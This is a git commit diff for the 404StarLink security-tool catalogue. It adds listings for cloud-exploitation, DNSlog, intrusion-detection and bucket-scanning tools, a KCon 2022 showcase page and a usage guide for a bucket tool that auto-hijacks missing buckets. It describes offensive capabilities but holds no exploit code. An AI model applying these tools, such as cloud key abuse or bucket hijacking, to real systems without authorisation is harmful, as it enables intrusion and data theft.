Projects STRLCPY 404StarLink Commits 3a1d74b8
🤬
  • feat: add new projects && add KCon2022

  • Loading...
  • xx committed 2 years ago
    3a1d74b8
    1 parent 0f469fec
  • ■ ■ ■ ■ ■ ■
    README.md
    skipped 16 lines
    17 17   
    18 18  | 时间 | 项目名称 | 项目动态 |
    19 19  |----|-----------|--------------------------|
     20 +|2022-08-29|[**Hades**](detail/Hades.md)|Hades加入星链计划|
     21 +|2022-08-29|[**Cloud-Bucket-Leak-Detection-Tools**](detail/Cloud-Bucket-Leak-Detection-Tools.md)|Cloud-Bucket-Leak-Detection-Tools加入星链计划|
     22 +|2022-08-29|[**Cola-Dnslog**](detail/Cola-Dnslog.md)|Cola-Dnslog加入星链计划|
     23 +|2022-08-29|[**cf**](detail/cf.md)|cf加入星链计划|
    20 24  |2022-08-24|[**pocsuite3**](detail/pocsuite3.md)|更新 [v1.9.9](detail/pocsuite3.md#最近更新) 版本|
    21 25  |2022-08-24|[**afrog**](detail/afrog.md)|更新 [v1.3.7](detail/afrog.md#最近更新) 版本|
     26 +|2022-08-23|[**KunLun-M**](detail/KunLun-M.md)|发布演示视频[404星链计划开源安全工具演示——KunLun-M](https://www.bilibili.com/video/BV15a411G7CT)|
    22 27  |2022-08-19|[**veinmind-tools**](detail/veinmind-tools.md)|更新 [v1.5.0](detail/veinmind-tools.md#最近更新) 版本|
    23 28  |2022-08-16|[**HackBrowserData**](detail/HackBrowserData.md)|更新 [v0.4.4](detail/HackBrowserData.md#最近更新) 版本|
    24 29  |2022-08-13|[**GShark**](detail/gshark.md)|更新 [v1.0.0](detail/gshark.md#最近更新) 版本|
    25  -|2022-08-07|[**Viper**](detail/Viper.md)|更新 [v1.5.23](detail/Viper.md#最近更新) 版本|
    26  -|2022-07-18|[**ct**](detail/ct.md)|更新 [v1.0.9](detail/ct.md#最近更新) 版本|
    27  -|2022-07-18|[**antSword**](detail/antSword.md)|发布文章[《AntSword v2.1.15 更新汇总》](https://mp.weixin.qq.com/s/QzbREMp8JaQiP9qo48OyHg)|
    28  -|2022-07-17|[**antSword**](detail/antSword.md)|更新 [v2.1.15](detail/antSword.md#最近更新) 版本|
    29  -|2022-07-15|[**HaE**](detail/HaE.md)|更新 [v2.4.2](detail/HaE.md#最近更新) 版本|
    30 30   
    31 31  **2.StarRank**
    32 32   
    skipped 29 lines
    62 62   
    63 63  | 时间 | 项目名称 | 项目简介 |
    64 64  |----|-----------|--------------------------|
     65 +|2022-08-29|[**Hades**](detail/Hades.md)|Hades 是一款支持 Windows/Linux 的内核级别数据采集主机入侵检测系统,其中每个插件均可独立分开运行。|
     66 +|2022-08-29|[**Cloud-Bucket-Leak-Detection-Tools**](detail/Cloud-Bucket-Leak-Detection-Tools.md)|Cloud-Bucket-Leak-Detection-Tools是一款针对云厂商存储桶扫描检测与利用的工具|
     67 +|2022-08-29|[**Cola-Dnslog**](detail/Cola-Dnslog.md)|Cola Dnslog 是一款更加强大的dnslog平台(无回显漏洞探测辅助平台),支持dns http ldap rmi等协议,提供API调用方式便于与其他工具结合,支持钉钉机器人、Bark等提醒,并支持docker一键部署。|
     68 +|2022-08-29|[**cf**](detail/cf.md)|CF 是一个云环境利用框架,主要用来方便红队人员在获得云服务 Access Key 的后续工作。|
    65 69  |2022-06-15|[**afrog**](detail/afrog.md)|afrog 是一款性能卓越、快速稳定、PoC 可定制的漏洞扫描工具,PoC 包含 CVE、CNVD、默认口令、信息泄露、指纹识别、未授权访问、任意文件读取、命令执行等多种漏洞类型,帮助网络安全从业者快速验证并及时修复漏洞。|
    66 70  |2022-06-15|[**BinAbsInspector**](detail/BinAbsInspector.md)|BinAbsInspector(Binary Abstract Inspector)是一款用于自动化逆向工程和扫描二进制文件漏洞的静态分析器,是 Keenlab 孵化的长期研究项目。基于 Ghidra 的支持下的抽象解释,适用于 Ghidra 的 Pcode 而非汇编。目前支持 x86、x64、armv7 和 aarch64 的二进制文件。|
    67 71  |2022-03-16|[**veinmind-tools**](detail/veinmind-tools.md)|veinmind-tools 是基于 veinmind-sdk 打造的一个容器安全工具集,目前已支持镜像 恶意文件/后门/敏感信息/弱口令 的扫描,更多功能正在逐步开发中。|
    68 72  |2022-03-16|[**DNSlog-GO**](detail/DNSlog-GO.md)|DNSLog-GO 是一款golang编写的监控 DNS 解析记录的工具,自带WEB界面。单文件运行,无依赖。部署方便快捷。|
    69 73  |2022-03-16|[**scaninfo**](detail/scaninfo.md)|scaninfo 是一款开源、轻量、快速、跨平台的红队内外网打点扫描器。比较同类工具,其能够在 nmap 的扫描速度和 masscan 的准确度之间寻找一个较好的平衡点,能够快速进行端口扫描和服务识别,内置指纹识别用于 web 探测,可以用报告的方式整理扫描结果。|
    70 74  |2021-12-13|[**ct**](detail/ct.md)|ct 是一款使用 rust 语言进行开发,并且基于ZoomEye域名查询以及利用域名字典进行子域名爆破的工具,同时在最终爆破完成后可使用脚本,将相应的的.gv 文件转化成为相应的 .png 文件进行可视化展示|
    71  -|2021-11-22|[**MySQL-Fake-Server**](detail/MySQL-Fake-Server.md)|用于渗透测试过程中的假MySQL服务器,纯原生python3实现,不依赖其它包。|
    72  -|2021-11-22|[**BurpCrypto**](detail/BurpCrypto.md)|支持多种加密算法或直接执行JS代码的用于爆破前端加密的BurpSuite插件。|
    73  -|2021-11-22|[**ysomap**](detail/ysomap.md)|Ysomap是一款适配于各类实际复杂环境的Java反序列化利用框架,可动态配置具备不同执行效果的Java反序列化利用链payload,以应对不同场景下的反序列化利用。|
    74  -|2021-11-22|[**Kunyu**](detail/Kunyu.md)|Kunyu(坤舆),是一款基于ZoomEye API开发的信息收集工具,旨在让企业资产收集更高效,使更多安全相关从业者了解、使用网络空间测绘技术。|
    75 75   
    76 76  **5.[分类:甲方工具](party_a.md)**
    77 77   
    skipped 4 lines
    82 82  |3|[**veinmind-tools**](detail/veinmind-tools.md)|长亭科技|veinmind-tools 是基于 veinmind-sdk 打造的一个容器安全工具集,目前已支持镜像 恶意文件/后门/敏感信息/弱口令 的扫描,更多功能正在逐步开发中。|834|
    83 83  |4|[**GShark**](detail/gshark.md)|madneal|一款开源敏感信息监测系统,可以监测包括 github、gitlab(目前不太稳定,由于gitlab对于免费用户不提供代码全文检索API)、searchcode 多平台的敏感信息监测。|570|
    84 84  |5|[**Juggler**](detail/Juggler.md)|C4o|一个也许能骗到黑客的系统,可以作为WAF等防护体系的一环。|412|
     85 +|6|[**Hades**](detail/Hades.md)|theSecHunter|Hades 是一款支持 Windows/Linux 的内核级别数据采集主机入侵检测系统,其中每个插件均可独立分开运行。|10|
    85 86   
    86 87  **6.[分类:信息收集](reconnaissance.md)**
    87 88   
    skipped 19 lines
    107 108  * [内网工具](intranet_tools.md)
    108 109  * [其他](others.md)
    109 110   
    110  -8.[入选2021Kcon兵器谱](column/2021KCon_exhibition_with_starlink.md)
    111  -9.[星链计划全部项目](allprojects.md)
    112  -10.[正在申请加入的项目](https://github.com/knownsec/404StarLink/issues)
     111 +8.[入选2021Kcon会兵器谱](column/2021KCon_exhibition_with_starlink.md)
     112 +9.[入选2022Kcon黑客大会兵器谱](column/2022KCon_exhibition_with_starlink.md)
     113 +10.[星链计划全部项目](allprojects.md)
     114 +11.[正在申请加入的项目](https://github.com/knownsec/404StarLink/issues)
    113 115   
    114 116  <!--auto_index_exhibition_end_bb3ccc282a0d1924df21437a263718c3-->
    115 117   
    skipped 61 lines
  • ■ ■ ■ ■ ■ ■
    allprojects.md
    skipped 6 lines
    7 7   * [veinmind-tools](#veinmind-tools)
    8 8   * [gshark](#gshark)
    9 9   * [Juggler](#juggler)
     10 + * [Hades](#hades)
    10 11   
    11 12  * [信息收集/reconnaissance](#信息收集reconnaissance)
    12 13   * [AppInfoScanner](#appinfoscanner)
    skipped 20 lines
    33 34   * [Viper](#viper)
    34 35   * [MDUT](#mdut)
    35 36   * [BurpCrypto](#burpcrypto)
     37 + * [cf](#cf)
    36 38   * [ysomap](#ysomap)
    37 39   * [MySQL-Fake-Server](#mysql-fake-server)
    38 40   * [DNSlog-GO](#dnslog-go)
     41 + * [Cloud-Bucket-Leak-Detection-Tools](#cloud-bucket-leak-detection-tools)
    39 42   * [Redis-Rogue-Server](#redis-rogue-server)
    40 43   * [MysqlT](#mysqlt)
     44 + * [Cola-Dnslog](#cola-dnslog)
    41 45   
    42 46  * [信息分析/information_analysis](#信息分析information_analysis)
    43 47   * [HackBrowserData](#hackbrowserdata)
    skipped 82 lines
    126 130  <https://github.com/C4o/Juggler>
    127 131   
    128 132  一个也许能骗到黑客的系统,可以作为WAF等防护体系的一环。
     133 + 
     134 +### [Hades](detail/Hades.md)
     135 +![Author](https://img.shields.io/badge/Author-theSecHunter-orange)
     136 +![Language](https://img.shields.io/badge/Language-Golang&C++&C-blue)
     137 +![GitHub stars](https://img.shields.io/github/stars/theSecHunter/Hades.svg?style=flat&logo=github)
     138 +![Version](https://img.shields.io/badge/Version-V0.0.1-red)
     139 + 
     140 +<https://github.com/theSecHunter/Hades>
     141 + 
     142 +Hades 是一款支持 Windows/Linux 的内核级别数据采集主机入侵检测系统,其中每个插件均可独立分开运行。
    129 143   
    130 144   
    131 145   
    skipped 204 lines
    336 350   
    337 351  支持多种加密算法或直接执行JS代码的用于爆破前端加密的BurpSuite插件。
    338 352   
     353 +### [cf](detail/cf.md)
     354 +![Author](https://img.shields.io/badge/Author-teamssix-orange)
     355 +![Language](https://img.shields.io/badge/Language-Golang-blue)
     356 +![GitHub stars](https://img.shields.io/github/stars/teamssix/cf.svg?style=flat&logo=github)
     357 +![Version](https://img.shields.io/badge/Version-V0.3.5-red)
     358 + 
     359 +<https://github.com/teamssix/cf>
     360 + 
     361 +CF 是一个云环境利用框架,主要用来方便红队人员在获得云服务 Access Key 的后续工作。
     362 + 
    339 363  ### [ysomap](detail/ysomap.md)
    340 364  ![Author](https://img.shields.io/badge/Author-wh1t3p1g-orange)
    341 365  ![Language](https://img.shields.io/badge/Language-Java-blue)
    skipped 24 lines
    366 390   
    367 391  DNSLog-GO 是一款golang编写的监控 DNS 解析记录的工具,自带WEB界面。单文件运行,无依赖。部署方便快捷。
    368 392   
     393 +### [Cloud-Bucket-Leak-Detection-Tools](detail/Cloud-Bucket-Leak-Detection-Tools.md)
     394 +![Author](https://img.shields.io/badge/Author-UzJu-orange)
     395 +![Language](https://img.shields.io/badge/Language-Python-blue)
     396 +![GitHub stars](https://img.shields.io/github/stars/UzJu/Cloud-Bucket-Leak-Detection-Tools.svg?style=flat&logo=github)
     397 +![Version](https://img.shields.io/badge/Version-V0.4.0-red)
     398 + 
     399 +<https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools>
     400 + 
     401 +Cloud-Bucket-Leak-Detection-Tools是一款针对云厂商存储桶扫描检测与利用的工具
     402 + 
    369 403  ### [Redis-Rogue-Server](detail/Redis-Rogue-Server.md)
    370 404  ![Author](https://img.shields.io/badge/Author-Dliv3-orange)
    371 405  ![Language](https://img.shields.io/badge/Language-Python-blue)
    skipped 13 lines
    385 419  <https://github.com/BeichenDream/MysqlT>
    386 420   
    387 421  伪造Myslq服务端,并利用Mysql逻辑漏洞来获取客户端的任意文件反击攻击。
     422 + 
     423 +### [Cola-Dnslog](detail/Cola-Dnslog.md)
     424 +![Author](https://img.shields.io/badge/Author-AbelChe-orange)
     425 +![Language](https://img.shields.io/badge/Language-Python-blue)
     426 +![GitHub stars](https://img.shields.io/github/stars/AbelChe/cola_dnslog.svg?style=flat&logo=github)
     427 +![Version](https://img.shields.io/badge/Version-V0.0.1-red)
     428 + 
     429 +<https://github.com/AbelChe/cola_dnslog>
     430 + 
     431 +Cola Dnslog 是一款更加强大的dnslog平台(无回显漏洞探测辅助平台),支持dns http ldap rmi等协议,提供API调用方式便于与其他工具结合,支持钉钉机器人、Bark等提醒,并支持docker一键部署。
    388 432   
    389 433   
    390 434   
    skipped 200 lines
  • ■ ■ ■ ■ ■ ■
    column/2021KCon_exhibition_with_starlink.md
    1  -## 入选2021Kcon兵器谱
     1 +## 入选2021Kcon会兵器谱
    2 2   
    3 3  KCon 黑客大会由知道创宇主办,秉持着追求干货、乐于分享的精神,力求为每一位热爱黑客技术研究的伙伴打造一个尽情展示、互动交流的创意舞台。如今,历经十年打磨,KCon 黑客大会已成长为国际网络安全圈极富活力与影响力的前沿网络安全攻防技术交流平台。本届 KCon 选择以“纵横”为主题,十之一纵一横,包罗万象,正如网络空间的攻与防,变幻莫测。而纵横之下的这场网安论道,将以打造全球性网安交流平台为发展目标,加速强化中国网安力量。
    4 4   
    5 5  <div align="center">
    6  -<img src="Images/2021KCon_exhibition_with_starlink_1.jpeg" width="700">
     6 +<img src="Images_2021KCon/1.jpeg" width="700">
    7 7  </div>
    8 8   
    9 9  详情可以访问: <http://kcon.knownsec.com/2021/#/>
    skipped 3 lines
    13 13  今年,在历时两个多月的招募与评选后,我们精心为大家挑选出了 11 件安全江湖的“神兵利器”,将于 KCon 现场尽情探索与展示!
    14 14   
    15 15  <div align="center">
    16  -<img src="Images/2021KCon_exhibition_with_starlink_2.jpeg" width="400">
     16 +<img src="Images_2021KCon/2.jpeg" width="400">
    17 17  </div>
    18 18   
    19 19  详情可以访问: <http://kcon.knownsec.com/2021/#/arsenal>
    skipped 23 lines
    43 43  CDK是一款为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP。集成Docker/K8s场景特有的逃逸、横向移动、持久化利用方式,插件化管理。
    44 44   
    45 45  <div align="center">
    46  -<img src="Images/2021KCon_exhibition_with_starlink_cdk.png" width="700">
     46 +<img src="Images_2021KCon/cdk.png" width="700">
    47 47  </div>
    48 48   
    49 49   
    skipped 7 lines
    57 57  Kunyu 是基于 ZoomEye 开发的工具,旨在让企业资产梳理更加高效,使更多安全从业者了解、使用网络空间测绘技术。
    58 58   
    59 59  <div align="center">
    60  -<img src="Images/2021KCon_exhibition_with_starlink_kunyu.png" width="700">
     60 +<img src="Images_2021KCon/kunyu.png" width="700">
    61 61  </div>
    62 62   
    63 63   
    skipped 7 lines
    71 71  一款红/蓝队环境自动化部署工具,支持多种场景,渗透,开发,代理环境,服务可选项等。
    72 72   
    73 73  <div align="center">
    74  -<img src="Images/2021KCon_exhibition_with_starlink_f8x.png" width="700">
     74 +<img src="Images_2021KCon/f8x.png" width="700">
    75 75  </div>
    76 76   
    77 77   
    skipped 7 lines
    85 85  VIPER是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化。
    86 86   
    87 87  <div align="center">
    88  -<img src="Images/2021KCon_exhibition_with_starlink_viper.jpg" width="700">
     88 +<img src="Images_2021KCon/viper.jpg" width="700">
    89 89  </div>
    90 90   
    91 91   
    skipped 7 lines
    99 99  Kunlun-Mirror 专注于安全研究人员使用的白盒代码审计工具
    100 100   
    101 101  <div align="center">
    102  -<img src="Images/2021KCon_exhibition_with_starlink_kunlun.png" width="700">
     102 +<img src="Images_2021KCon/kunlun.png" width="700">
    103 103  </div>
    104 104   
    105 105   
    skipped 7 lines
    113 113  Pocassist 是一个 Golang 编写的全新开源漏洞测试框架,帮助安全人员专注于漏洞验证的逻辑的实现。Pocassist 提供了简洁的 Web 图形化界面,用户可以在线编辑漏洞验证程序即可进行批量的测试;规则完全兼容 xray,可以直接使用现有开源的 PoC 库,同时也支持添加自定义规则。
    114 114   
    115 115  <div align="center">
    116  -<img src="Images/2021KCon_exhibition_with_starlink_pocassist.jpg" width="700">
     116 +<img src="Images_2021KCon/pocassist.jpg" width="700">
    117 117  </div>
    118 118   
    119 119   
    skipped 7 lines
    127 127  Stowaway 是一款多级代理工具,可将外部流量通过多个节点代理至内网,突破内网访问限制。Stowaway 可以方便渗透测试人员通过多级跳跃,从外部dmz等一系列区域逐步深入核心网络;Stowaway 除了流量转发功能,还提供了端口复用、ssh隧道,流量伪装等专为渗透测试人员所用的功能。
    128 128   
    129 129  <div align="center">
    130  -<img src="Images/2021KCon_exhibition_with_starlink_stowaway.png" width="700">
     130 +<img src="Images_2021KCon/stowaway.png" width="700">
    131 131  </div>
    132 132   
    133 133   
    skipped 7 lines
    141 141  一款开源敏感信息监测系统,可以监测包括 github、gitlab(目前不太稳定,由于gitlab对于免费用户不提供代码全文检索API)、searchcode 多平台的敏感信息监测。
    142 142   
    143 143  <div align="center">
    144  -<img src="Images/2021KCon_exhibition_with_starlink_gshark.png" width="700">
     144 +<img src="Images_2021KCon/gshark.png" width="700">
    145 145  </div>
    146 146   
  • ■ ■ ■ ■ ■ ■
    column/2022KCon_exhibition_with_starlink.md
     1 +## 入选2022KCon黑客大会兵器谱
     2 +
     3 +2022年是 KCon 黑客大会举办的第11个年头,亦是10年圆满后踏上新征程的第1步,主题为“**+1 进阶,护航未来**”。
     4 +
     5 +“+1”或许并不起眼,但“不积跬步,无以至千里;不积小流,无以成江海”。众多“+1”汇聚,便能以量变引起质变,化不可能为可能。网络空间发展至今,机遇与威胁并存,攻击与防守互搏。护航网络空间的未来发展之路,需要聚力成盾,这凝聚着安全技术人员每一次 **“+1”的修复、“+1”的努力、“+1”的创新、“+1”的突破**。
     6 +
     7 +KCon黑客大会,汇聚黑客智慧,专注网络攻防技术交流。我们希望为众多“+1”的探索者提供分享与碰撞的舞台,为网络安全的进阶助力。
     8 +
     9 +<div align="center">
     10 +<img src="Images_2022KCon/1.png" width="700">
     11 +</div>
     12 +
     13 +详情访问:[KCon 2022 - KCon 黑客大会](https://kcon.knownsec.com/list-kcon2022.html)
     14 +
     15 +众所周知,网络实战攻防离不开各类自动化工具的运用。安全自动化工具是网安研究人员脑力和经验的结晶,它的加持能让安全人员从“白打”升级到全副武装状态,帮助展示及处理诸多复杂、耗时的安全问题,明确风险、提升效率、加强防御。
     16 +
     17 +KCon「兵器谱」展示便是为鼓励国内安全自动化工具的发展而设立,现已成为每届 KCon 的传统。本届 KCon,有**14**件经过精心筛选的安全“兵器”等待大家探索。
     18 +
     19 +<div align="center">
     20 +<img src="Images_2022KCon/2.png" width="700">
     21 +</div>
     22 +
     23 +其中有 7 个项目来自404星链计划,他们分别是:
     24 +
     25 +- AppInfoScanner
     26 +- As-Exploits
     27 +- Cloud-Bucket-Leak-Detection-Tools
     28 +- fscan
     29 +- HaE
     30 +- openstar
     31 +- veinmind-tools
     32 +
     33 +>排名不分先后
     34 +
     35 +
     36 +### [AppInfoScanner](https://github.com/knownsec/404StarLink/blob/master/detail/AppInfoScanner.md)
     37 +
     38 +![Language](https://img.shields.io/badge/Language-Python-blue)
     39 +![Author](https://img.shields.io/badge/Author-kelvinBen-orange)
     40 +![GitHub stars](https://img.shields.io/github/stars/kelvinBen/AppInfoScanner.svg?style=flat&logo=github)
     41 +![Version](https://img.shields.io/badge/Version-V1.0.8-red)
     42 +
     43 +https://github.com/kelvinBen/AppInfoScanner
     44 +
     45 +一款适用于以HW行动/红队/渗透测试团队为场景的移动端(Android、iOS、WEB、H5、静态网站)信息收集扫描工具,可以帮助渗透测试工程师、攻击队成员、红队成员快速收集到移动端或者静态WEB站点中关键的资产信息并提供基本的信息输出,如:Title、Domain、CDN、指纹信息、状态信息等。
     46 +
     47 +[点击查看兵器谱视频演示](https://www.bilibili.com/video/BV1Mt4y1J7Vh?spm_id_from=333.999.0.0&vd_source=43f31648998a33a14a20b812fed90047)
     48 +
     49 +
     50 +### [As-Exploits](https://github.com/knownsec/404StarLink/blob/master/detail/As-Exploits.md)
     51 +
     52 +![Author](https://img.shields.io/badge/Author-yzddmr6-orange)
     53 +![Language](https://img.shields.io/badge/Language-JavaScript-blue)
     54 +![GitHub stars](https://img.shields.io/github/stars/yzddmr6/As-Exploits.svg?style=flat&logo=github)
     55 +![Version](https://img.shields.io/badge/Version-V1.0.0-red)
     56 +
     57 +https://github.com/yzddmr6/As-Exploits
     58 +
     59 +中国蚁剑后渗透框架
     60 +
     61 +
     62 +### [Cloud-Bucket-Leak-Detection-Tools](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools)
     63 +
     64 +![Author](https://img.shields.io/badge/Author-UzJu-orange)
     65 +![Language](https://img.shields.io/badge/Language-Python-blue)
     66 +![GitHub stars](https://img.shields.io/github/stars/UzJu/Cloud-Bucket-Leak-Detection-Tools.svg?style=flat&logo=github)
     67 +![Version](https://img.shields.io/badge/Version-V0.4.0-red)
     68 +
     69 +https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools
     70 +
     71 +云原生安全近几年比较火,存储桶在企业(SRC众测)中暴露的问题也非常多,不仅仅局限于AK/SK的泄露,更多的是用户配置侧的问题,这款工具就是用来代替我们手工解决一些繁琐的操作。
     72 +
     73 +[点击查看兵器谱视频演示](https://www.bilibili.com/video/BV1ye411g76v?spm_id_from=333.999.0.0&vd_source=43f31648998a33a14a20b812fed90047)
     74 +
     75 +
     76 +### [fscan](https://github.com/knownsec/404StarLink/blob/master/detail/fscan.md)
     77 +
     78 +![Author](https://img.shields.io/badge/Author-shadow1ng-orange)
     79 +![Language](https://img.shields.io/badge/Language-Golang-blue)
     80 +![GitHub stars](https://img.shields.io/github/stars/shadow1ng/fscan.svg?style=flat&logo=github)
     81 +![Version](https://img.shields.io/badge/Version-V1.8.1-red)
     82 +
     83 +https://github.com/shadow1ng/fscan
     84 +
     85 +一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。
     86 +
     87 +[点击查看兵器谱视频演示](https://www.bilibili.com/video/BV1vG4115722?spm_id_from=333.999.0.0&vd_source=43f31648998a33a14a20b812fed90047)
     88 +
     89 +
     90 +### [HaE](https://github.com/knownsec/404StarLink/blob/master/detail/HaE.md)
     91 +
     92 +![Author](https://img.shields.io/badge/Author-gh0stkey-orange)
     93 +![Language](https://img.shields.io/badge/Language-Java-blue)
     94 +![GitHub stars](https://img.shields.io/github/stars/gh0stkey/HaE.svg?style=flat&logo=github)
     95 +![Version](https://img.shields.io/badge/Version-V2.4.2-red)
     96 +
     97 +https://github.com/gh0stkey/HaE
     98 +
     99 +HaE是一款可以快速挖掘目标指纹和关键信息的Burp插件。
     100 +
     101 +[点击查看兵器谱视频演示](https://www.bilibili.com/video/BV16D4y167uX?spm_id_from=333.999.0.0&vd_source=43f31648998a33a14a20b812fed90047)
     102 +
     103 +
     104 +### [OpenStar](https://github.com/knownsec/404StarLink/blob/master/detail/OpenStar.md)
     105 +
     106 +![Author](https://img.shields.io/badge/Author-starjun-orange)
     107 +![Language](https://img.shields.io/badge/Language-JS/Python-blue)
     108 +![GitHub stars](https://img.shields.io/github/stars/starjun/openstar.svg?style=flat&logo=github)
     109 +![Version](https://img.shields.io/badge/Version-V1.0.0-red)
     110 +
     111 +https://github.com/starjun/openstar
     112 +
     113 +OpenStar 是一个基于 OpenResty 的高性能 Web 应用防火墙,支持复杂规则编写。提供了常规的 HTTP 字段规则配置,还提供了 IP 黑白名单、访问频次等配置,对于 CC 防护更提供的特定的规则算法,并且支持搭建集群进行防护。
     114 +
     115 +[点击查看兵器谱视频演示](https://www.bilibili.com/video/BV1YB4y1G7mr?spm_id_from=333.999.0.0&vd_source=43f31648998a33a14a20b812fed90047)
     116 +
     117 +
     118 +### [veinmind-tools](https://github.com/knownsec/404StarLink/blob/master/detail/veinmind-tools.md)
     119 +
     120 +![Author](https://img.shields.io/badge/Author-长亭科技-orange)
     121 +![Language](https://img.shields.io/badge/Language-Golang/Python-blue)
     122 +![GitHub stars](https://img.shields.io/github/stars/chaitin/veinmind-tools.svg?style=flat&logo=github)
     123 +![Version](https://img.shields.io/badge/Version-V1.5.0-red)
     124 +
     125 +https://github.com/chaitin/veinmind-tools
     126 +
     127 +veinmind-tools 是基于 veinmind-sdk 打造的一个容器安全工具集,目前已支持镜像 恶意文件/后门/敏感信息/弱口令 的扫描,更多功能正在逐步开发中。
     128 +
     129 +[点击查看兵器谱视频演示](https://www.bilibili.com/video/BV1MP411V7v6?spm_id_from=333.999.0.0&vd_source=43f31648998a33a14a20b812fed90047)
     130 + 
  • column/Images/2021KCon_exhibition_with_starlink_1.jpeg column/Images_2021KCon/1.jpeg
  • column/Images/2021KCon_exhibition_with_starlink_2.jpeg column/Images_2021KCon/2.jpeg
  • column/Images/2021KCon_exhibition_with_starlink_cdk.png column/Images_2021KCon/cdk.png
  • column/Images/2021KCon_exhibition_with_starlink_f8x.png column/Images_2021KCon/f8x.png
  • column/Images/2021KCon_exhibition_with_starlink_gshark.png column/Images_2021KCon/gshark.png
  • column/Images/2021KCon_exhibition_with_starlink_kunlun.png column/Images_2021KCon/kunlun.png
  • column/Images/2021KCon_exhibition_with_starlink_kunyu.png column/Images_2021KCon/kunyu.png
  • column/Images/2021KCon_exhibition_with_starlink_pocassist.jpg column/Images_2021KCon/pocassist.jpg
  • column/Images/2021KCon_exhibition_with_starlink_stowaway.png column/Images_2021KCon/stowaway.png
  • column/Images/2021KCon_exhibition_with_starlink_viper.jpg column/Images_2021KCon/viper.jpg
  • column/Images_2022KCon/1.png
  • column/Images_2022KCon/2.png
  • ■ ■ ■ ■ ■ ■
    detail/Cloud-Bucket-Leak-Detection-Tools.md
     1 +## Cloud-Bucket-Leak-Detection-Tools <https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools>
     2 +<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
     3 +![Language](https://img.shields.io/badge/Language-Python-blue)
     4 +![Author](https://img.shields.io/badge/Author-UzJu-orange)
     5 +![GitHub stars](https://img.shields.io/github/stars/UzJu/Cloud-Bucket-Leak-Detection-Tools.svg?style=flat&logo=github)
     6 +![Version](https://img.shields.io/badge/Version-V0.4.0-red)
     7 +![Time](https://img.shields.io/badge/Join-20220829-green)
     8 +<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
     9 + 
     10 + 
     11 +```bash
     12 +git clone https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools.git
     13 +cd Cloud-Bucket-Leak-Detection-Tools/
     14 +# 安装依赖 建议使用Python3.8以上的版本 我的版本: Python 3.9.13 (main, May 24 2022, 21:28:31)
     15 +# 已经测试版本如下
     16 +# 1、python3.8.9
     17 +# 2、python3.9.13
     18 +# 3、python3.7
     19 +# 4、python3.6.15
     20 +# 5、python3.9.6
     21 +pip3 install -r requirements.txt
     22 +python3 main.py -h
     23 +```
     24 + 
     25 +![image-20220716140707903](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716140707903.png)
     26 + 
     27 +使用之前需要在`config/conf.py`文件配置自己对应的云厂商AK
     28 + 
     29 +![image-20220716140934866](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716140934866.png)
     30 + 
     31 +## 1、阿里云存储桶
     32 + 
     33 +### 1.1、单个存储桶检测
     34 + 
     35 +```bash
     36 +python3 main.py -aliyun [存储桶URL]
     37 +```
     38 + 
     39 +![image-20220716141132931](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716141132931.png)
     40 + 
     41 +### 1.2、自动存储桶劫持
     42 + 
     43 +当如果检测存储桶不存在时会自动劫持该存储桶
     44 + 
     45 +![image-20220703202339058](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220703202339058.png)
     46 + 
     47 +### 1.3、批量存储桶地址检测
     48 + 
     49 +```bash
     50 +# fofa语法
     51 +domain="aliyuncs.com"
     52 +server="AliyunOSS"domain="aliyuncs.com"
     53 +```
     54 + 
     55 +```bash
     56 +# 使用-faliyun
     57 +python3 main.py -faliyun url.txt
     58 +```
     59 + 
     60 +![image-20220716141356518](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716141356518.png)
     61 + 
     62 +## 2、腾讯云存储桶
     63 + 
     64 +```bash
     65 +python3 main.py -tcloud [存储桶地址]
     66 +```
     67 + 
     68 +![image-20220716141554856](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716141554856.png)
     69 + 
     70 +## 3、华为云存储桶
     71 + 
     72 +```bash
     73 +python3 main.py -hcloud [存储桶地址]
     74 +```
     75 + 
     76 +![image-20220716141948046](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716141948046.png)
     77 + 
     78 +## 4、AWS存储桶
     79 + 
     80 +```bash
     81 +python3 main.py -aws [存储桶地址]
     82 +```
     83 + 
     84 +![image-20220716142431142](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716142431142.png)
     85 + 
     86 +## 5、扫描结果保存
     87 + 
     88 +扫描结果会存放在`results`目录下
     89 + 
     90 +![image-20220716142617997](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716142617997.png)
     91 + 
     92 +![image-20220716142641883](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716142641883.png)
     93 + 
     94 + 
     95 +<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
     96 +## 项目相关
     97 + 
     98 + 
     99 +## 最近更新
     100 + 
     101 +<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
     102 + 
  • ■ ■ ■ ■ ■ ■
    detail/Cola-Dnslog.md
     1 +## Cola-Dnslog <https://github.com/AbelChe/cola_dnslog>
     2 +<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
     3 +![Language](https://img.shields.io/badge/Language-Python-blue)
     4 +![Author](https://img.shields.io/badge/Author-AbelChe-orange)
